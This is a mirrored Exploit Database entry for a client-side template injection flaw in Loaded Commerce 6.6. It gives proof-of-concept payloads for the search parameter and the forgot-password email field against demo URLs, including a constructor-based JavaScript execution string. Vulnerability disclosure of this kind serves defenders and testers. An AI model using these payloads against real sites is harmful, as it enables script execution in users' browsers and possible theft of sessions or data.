Loaded Commerce 6.6 – Client-Side Template Injection(CSTI)

• Exploit Database
• 7 阅读

• 作者： tmrswrr
  日期： 2025-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52084/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  # Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI) # Date: 03/13/2025 # Exploit Author: tmrswrr # Vendor Homepage: https://loadedcommerce.com/ # Version: 6.6 # Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce   Injecting {{7*7}} into the search parameter https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}} returns 49, confirming a template injection vulnerability.   Forgot Password: Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process triggers an alert, demonstrating client-side code execution.